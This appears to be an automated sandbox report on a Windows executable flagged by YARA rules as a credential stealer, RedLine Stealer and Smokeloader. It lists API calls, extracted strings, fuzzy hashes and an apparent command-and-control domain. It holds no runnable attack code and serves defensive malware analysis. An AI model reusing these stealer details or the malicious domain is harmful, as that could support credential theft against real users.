2025-01-11 07:06:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:05:49
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\Q7QR4k52HL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q7QR4k52HL.exe"
Imagebase:	0x400000
File size:	333'312 bytes
MD5 hash:	1B513E6F8721E444A9364DD93630F015
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1929908575.0000000000554000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1743630116.0000000000553000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1743436987.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:06:00
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1828
Imagebase:	0x410000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	18.4%
Signature Coverage:	52.9%
Total number of Nodes:	174
Total number of Limit Nodes:	14

Executed Functions

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243

Strings

96, xrefs: 0043BE52
:;$%, xrefs: 0043C2EC
n:T8, xrefs: 0043BE4A
[&h$, xrefs: 0043BE32
M, xrefs: 0043BB5B
k"@ , xrefs: 0043BE3A
#~|, xrefs: 0043B89D
#~|, xrefs: 0043B8A7
F*R(, xrefs: 0043BE2A
e?^, xrefs: 0043BC4F

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 1810270423-2807872674
Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 00415720 Relevance: 17.5, APIs: 1, Strings: 8, Instructions: 1798COMMON

Download Yara Rule

Strings

a, xrefs: 004163D3
L, xrefs: 004162B2
F2}0, xrefs: 00415A76
9?4<, xrefs: 00416345
DASS, xrefs: 0041629C
NR@:, xrefs: 00416291
BYQZ, xrefs: 00416286
R(RW, xrefs: 00416265

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-3642574725
Opcode ID: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Bc*}, xrefs: 0040B3C6
`/(), xrefs: 0040B588
K{Du, xrefs: 0040B3DA
?_oY, xrefs: 0040B389
6C(], xrefs: 0040B382
fWpQ, xrefs: 0040B397
@w@q, xrefs: 0040B3E4

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ijkdefgau`c, xrefs: 00421FBE
au`c, xrefs: 00421FC6
defgau`c, xrefs: 00421FCA

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56

Function 005807A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005807CE
Module32First.KERNEL32(00000000,00000224), ref: 005807EE

Memory Dump Source

Source File: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d4e223ec739f83a1a0062686fbb4b3eba234cf6a0a95aec206269faca5c92401
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: FCF062311017116FE7603AB5988DA6F7AE8FF49B65F101528EA42E10C0DA70F8494B61

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040AA37
MO, xrefs: 0040A9CF

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040CFEC Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

FF468920BFFA1172D0632DF0E28DC412, xrefs: 0040D16B

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: FF468920BFFA1172D0632DF0E28DC412
API String ID: 0-2657772603
Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744

Function 0040CA62 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
Instruction ID: 618579726118e679aa1534d0b4440190eb114bb965ab7fb83873a39d39203c85
Opcode Fuzzy Hash: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
Instruction Fuzzy Hash: 3E5136766083118BC718DF64D89266BB7E2FFD4304F18DA2EE4C69B390DB749801C786

Function 0040C334 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0081024D

Strings

cess, xrefs: 0081018D
kernel32.dll, xrefs: 0081008F, 00810095

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f6093475901ca60e80cc3f331bc2662dae69c62b94434f60525690b1d0a0d3c1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F526874A012299FDB64CF58C984BA8BBB5BF09304F1480E9E94DAB251DB70AEC4DF15

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

Function 00810E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00810223,?,?), ref: 00810E19
SetErrorMode.KERNELBASE(00000000,?,?,00810223,?,?), ref: 00810E1E

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 38a33d7cf77271eff4fc9badce6bc49676e91161f5414cc284fa2bfc160f7c8c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5AD0123114512877DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B0998046E5

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
Opcode Fuzzy Hash: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0040AB46

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Function 00580465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005804B6

Memory Dump Source

Source File: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: fb63342c5605235f2c974cdee0cc47e477234a6bec6fa23bb39655c2a3745a14
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 88112B79A40208EFDB41DF98C985E98BFF5AF08350F058094FA48AB362D371EA50DF80

Non-executed Functions

Function 00834166 Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

n, xrefs: 008344BE
J, xrefs: 008343E3
j, xrefs: 008344AE
F, xrefs: 008343C7
n, xrefs: 00834235
r, xrefs: 0083441B
b, xrefs: 0083448B
|, xrefs: 0083447D
\, xrefs: 0083439D
>, xrefs: 00834251
0, xrefs: 0083424D
X, xrefs: 00834381
-, xrefs: 00834422
@, xrefs: 008344CA
Q, xrefs: 00834430
0, xrefs: 00834239
A, xrefs: 00834613
h, xrefs: 008344B6
l, xrefs: 008344C6
sputnik-1985.com, xrefs: 008346EE
^, xrefs: 0083438F
q, xrefs: 00834245
x, xrefs: 008341A5
p, xrefs: 00834429
H, xrefs: 008343F1
}, xrefs: 008345F7
d, xrefs: 008344A6
2, xrefs: 0083422D
(, xrefs: 00834414
?, xrefs: 008343EA
:, xrefs: 008344BA
f, xrefs: 00834255
h, xrefs: 008343DC
L, xrefs: 0083440D
~, xrefs: 0083446F
1, xrefs: 00834229
N, xrefs: 00834605
N, xrefs: 008343FF
@, xrefs: 008343B9
/, xrefs: 008341AD
v, xrefs: 00834437
D, xrefs: 008343D5
8, xrefs: 008341B1
7, xrefs: 0083423D
x, xrefs: 00834461
>, xrefs: 008341B5
1, xrefs: 00834241
f, xrefs: 0083449E
z, xrefs: 00834453
&, xrefs: 008343B2
`, xrefs: 00834496
4, xrefs: 00834249
?, xrefs: 008341A9
V, xrefs: 008341B9
t, xrefs: 00834445
&, xrefs: 00834231
B, xrefs: 008343AB
FF468920BFFA1172D0632DF0E28DC412, xrefs: 00834326

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$4$7$8$:$>$>$?$?$@$@$A$B$D$F$FF468920BFFA1172D0632DF0E28DC412$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
API String ID: 0-110374050
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 59b5cd5ea2a31f07bcfcc8c611eab240a7f45cdae87eb92146df94f5296072d2
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: 94027221D087D989DB22C67C8C483CDBFA15B63324F1883DDD0E86B3D6D6B90946CB66

Function 00423EFF Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

n, xrefs: 00424257
>, xrefs: 00423FEA
f, xrefs: 00424237
j, xrefs: 00424247
v, xrefs: 004241D0
?, xrefs: 00424183
A, xrefs: 004243AC
0, xrefs: 00423FE6
&, xrefs: 0042414B
FF468920BFFA1172D0632DF0E28DC412, xrefs: 004240BF
&, xrefs: 00423FCA
N, xrefs: 00424198
1, xrefs: 00423FDA
8, xrefs: 00423F4A
B, xrefs: 00424144
n, xrefs: 00423FCE
t, xrefs: 004241DE
7, xrefs: 00423FD6
x, xrefs: 00423F3E
-, xrefs: 004241BB
L, xrefs: 004241A6
@, xrefs: 00424263
p, xrefs: 004241C2
|, xrefs: 00424216
l, xrefs: 0042425F
b, xrefs: 00424224
:, xrefs: 00424253
\, xrefs: 00424136
@, xrefs: 00424152
H, xrefs: 0042418A
d, xrefs: 0042423F
sputnik-1985.com, xrefs: 00424487
4, xrefs: 00423FE2
Q, xrefs: 004241C9
0, xrefs: 00423FD2
V, xrefs: 00423F52
}, xrefs: 00424390
1, xrefs: 00423FC2
